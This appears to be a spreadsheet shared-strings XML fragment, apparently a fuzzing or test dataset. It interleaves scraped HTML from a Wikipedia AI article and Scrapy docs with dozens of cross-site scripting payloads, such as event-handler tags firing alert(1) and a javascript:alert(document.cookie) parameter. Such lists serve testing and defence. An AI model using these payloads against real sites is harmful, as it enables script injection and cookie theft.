    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Atlantic&amp;amp;rft.atitle=What+Jobs+Will+the+Robots+Take%3F&amp;amp;rft.date=2018&amp;amp;rft.aulast=Thompson&amp;amp;rft.aufirst=Derek&amp;amp;rft_id=https%3A%2F%2Fwww.theatlantic.com%2Fbusiness%2Farchive%2F2014%2F01%2Fwhat-jobs-will-the-robots-take%2F283239%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bgsound draggable="true" ondragstart="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;slot draggable="true" ondragstart="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ranulph_Glanville" title="Ranulph Glanville"&gt;Ranulph Glanville &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code draggable="true" ondrag="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 onactivate=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1080%2F09540090310001655110"&gt;10.1080/09540090310001655110 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Connection+Science&amp;amp;rft.atitle=Developmental+robotics%3A+a+survey&amp;amp;rft.volume=15&amp;amp;rft.issue=4&amp;amp;rft.pages=151-190&amp;amp;rft.date=2003&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.83.7615&amp;amp;rft_id=info%3Adoi%2F10.1080%2F09540090310001655110&amp;amp;rft.aulast=Lungarella&amp;amp;rft.aufirst=M.&amp;amp;rft.au=Metta%2C+G.&amp;amp;rft.au=Pfeifer%2C+R.&amp;amp;rft.au=Sandini%2C+G.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;rp onload=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;430–449 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;td onbeforepaste="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/latest/"&gt;latest&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;hr/&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmouseleave="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;del onmouseup="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;element onkeyup="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerover=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmouseover="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/body&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/script&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFEdelman2007" class="citation web"&gt;&lt;a href="/wiki/Gerald_Edelman" title="Gerald Edelman"&gt;Edelman, Gerald &lt;/a&gt; (23 November 2007). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20091008184132/http://lis.epfl.ch/resources/podcast/2007/11/gerald-edelman-neural-darwinism-and.html"&gt;"Gerald Edelman – Neural Darwinism and Brain-based Devices" &lt;/a&gt;. Talking Robots. Archived from &lt;a rel="nofollow" class="external text" href="http://lis.epfl.ch/resources/podcast/2007/11/gerald-edelman-neural-darwinism-and.html"&gt;the original &lt;/a&gt; on 8 October 2009. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Gerald+Edelman+%E2%80%93+Neural+Darwinism+and+Brain-based+Devices&amp;amp;rft.pub=Talking+Robots&amp;amp;rft.date=2007-11-23&amp;amp;rft.aulast=Edelman&amp;amp;rft.aufirst=Gerald&amp;amp;rft_id=http%3A%2F%2Flis.epfl.ch%2Fresources%2Fpodcast%2F2007%2F11%2Fgerald-edelman-neural-darwinism-and.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>/?param=&lt;javascript:alert(document.cookie&gt;)</t>
  </si>
  <si>
    <t>&lt;br onmouseover="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_in_England-39"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_in_England_39-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;template onmouseup="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;small id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmousemove="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onblur=alert(1) tabindex=1 id=x&gt;&lt;/canvas&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;element onpointerdown=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onbeforecopy="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>a="get";</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_computation" title="Evolutionary computation"&gt;Evolutionary computation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-schmidhuber2015-246"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-schmidhuber2015_246-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-schmidhuber2015_246-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-schmidhuber2015_246-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-schmidhuber2015_246-3"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;d &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Robotics and Autonomous Systems &lt;/i&gt;. &lt;b&gt;6 &lt;/b&gt; (1–2): 3–15. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.588.7539"&gt;10.1.1.588.7539 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;noframes onpaste="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/wbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Humanoid_robot" title="Humanoid robot"&gt;Humanoid &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmouseup="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=AI%4050%3A+AI+Past%2C+Present%2C+Future&amp;amp;rft.place=Dartmouth+College&amp;amp;rft.date=2006&amp;amp;rft.aulast=Maker&amp;amp;rft.aufirst=Meg+Houston&amp;amp;rft_id=http%3A%2F%2Fwww.engagingexperience.com%2F2006%2F07%2Fai50_ai_past_pr.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/plaintext&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmouseleave="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Philosophy_of_science" title="Template:Philosophy of science"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Philosophy_of_science" title="Template talk:Philosophy of science"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Philosophy_of_science&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Natural_language_processing-120"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Natural_language_processing_120-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFFearn2007" class="citation book"&gt;Fearn, Nicholas (2007). &lt;i&gt;The Latest Answers to the Oldest Questions: A Philosophical Adventure with the World's Greatest Thinkers &lt;/i&gt;. New York: Grove Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-8021-1839-4" title="Special:BookSources/978-0-8021-1839-4"&gt;&lt;bdi&gt;978-0-8021-1839-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Latest+Answers+to+the+Oldest+Questions%3A+A+Philosophical+Adventure+with+the+World%27s+Greatest+Thinkers&amp;amp;rft.place=New+York&amp;amp;rft.pub=Grove+Press&amp;amp;rft.date=2007&amp;amp;rft.isbn=978-0-8021-1839-4&amp;amp;rft.aulast=Fearn&amp;amp;rft.aufirst=Nicholas&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_social_science" title="Philosophy of social science"&gt;Social science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/applet&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;span oncontextmenu="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;summary onmousedown="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-5"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-5"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;Anthropomorphic</t>
  </si>
  <si>
    <t>&lt;body onpointerdown=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;font onmouseleave="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;listing style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;input ondrop=alert(1) contenteditable&gt;drop here&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 4.2, 7.2 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-319"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-319"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;abbr onmouseout="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmouseover="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;ruby id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/link-extractors.html"&gt;Link Extractors&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;27, 32–58, 968–972 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title onmouseup="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;button onbeforepaste="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Bayesian_networks-205"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Bayesian_networks_205-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;output onbeforecut="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;span id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-175"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-175"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-aizenberg2000-251"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-aizenberg2000_251-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;select draggable="true" ondragend="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;menu onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/menu&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Autonomous weapons </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;xmp style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpaste="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-333"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-333"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;object onkeypress="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Representing_knowledge_about_knowledge-96"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Representing_knowledge_about_knowledge_96-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Representing_knowledge_about_knowledge_96-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Hart, P. E.; Nilsson, N. J.; Raphael, B. (1972). "Correction to "A Formal Basis for the Heuristic Determination of Minimum Cost Paths&lt;span class="cs1-kern-right"&gt;" </t>
  </si>
  <si>
    <t>&lt;hr onpaste="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;script onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/script&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;base draggable="true" ondrag="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointerup=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;strong oncut="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Today, neural networks are often trained by the &lt;a href="/wiki/Backpropagation" title="Backpropagation"&gt;backpropagation &lt;/a&gt; algorithm, which had been around since 1970 as the reverse mode of &lt;a href="/wiki/Automatic_differentiation" title="Automatic differentiation"&gt;automatic differentiation &lt;/a&gt; published by &lt;a href="/wiki/Seppo_Linnainmaa" title="Seppo Linnainmaa"&gt;Seppo Linnainmaa &lt;/a&gt;,&lt;sup id="cite_ref-lin1970_239-0" class="reference"&gt;&lt;a href="#cite_note-lin1970-239"&gt;&amp;#91;228&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-grie2012_240-0" class="reference"&gt;&lt;a href="#cite_note-grie2012-240"&gt;&amp;#91;229&amp;#93; &lt;/a&gt; &lt;/sup&gt; and was introduced to neural networks by &lt;a href="/wiki/Paul_Werbos" title="Paul Werbos"&gt;Paul Werbos &lt;/a&gt;.&lt;sup id="cite_ref-WERBOS1974_241-0" class="reference"&gt;&lt;a href="#cite_note-WERBOS1974-241"&gt;&amp;#91;230&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-werbos1982_242-0" class="reference"&gt;&lt;a href="#cite_note-werbos1982-242"&gt;&amp;#91;231&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Backpropagation_243-0" class="reference"&gt;&lt;a href="#cite_note-Backpropagation-243"&gt;&amp;#91;232&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointerup=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointerup=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound draggable="true" ondragend="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;style onload=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;textarea oncontextmenu="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;samp onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/samp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&amp;#X000003C;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-75"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-75"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;button ondblclick="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;big onload=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Domain-specific_language" title="Domain-specific language"&gt;Domain-specific language &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 onfocus=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpointerup=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;ol oncontextmenu="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;b draggable="true" ondragenter="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpaste="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmouseleave="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;caption id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpointerout=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;span onmousemove="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bdo style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerdown=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;link rel="stylesheet" href="_static/css/tooltipster.custom.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;button onmouseout="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;pre onkeydown="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onclick="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpaste="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpaste="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;set onbegin=alert(1) attributename=x dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;strike oncopy="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_Hall_of_Fame" title="Robot Hall of Fame"&gt;Hall of Fame &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time onmouseup="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;rt oncut="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/ol&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Check how Scrapy performs on your hardware.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmouseup="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmousemove="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-62"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-62"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;svg id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;svg ondblclick="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;thead id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;table onpaste="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onbeforecut="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmousedown="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In the twenty-first century, AI techniques have experienced a resurgence following concurrent advances in &lt;a href="/wiki/Computer_performance" title="Computer performance"&gt;computer power &lt;/a&gt;, large amounts of &lt;a href="/wiki/Big_data" title="Big data"&gt;data &lt;/a&gt;, and theoretical understanding; and AI techniques have become an essential part of the &lt;a href="/wiki/Technology_industry" class="mw-redirect" title="Technology industry"&gt;technology industry &lt;/a&gt;, helping to solve many challenging problems in computer science, &lt;a href="/wiki/Software_engineering" title="Software engineering"&gt;software engineering &lt;/a&gt; and &lt;a href="/wiki/Operations_research" title="Operations research"&gt;operations research &lt;/a&gt;.&lt;sup id="cite_ref-AI_widely_used_25-0" class="reference"&gt;&lt;a href="#cite_note-AI_widely_used-25"&gt;&amp;#91;25&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-AI_in_2000s_13-1" class="reference"&gt;&lt;a href="#cite_note-AI_in_2000s-13"&gt;&amp;#91;13&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;frameset&gt;&lt;frame id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-71"&gt;&lt;a href="#Explanatory_notes"&gt;&lt;span class="tocnumber"&gt;12 </t>
  </si>
  <si>
    <t>&lt;bdi onbeforecopy="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
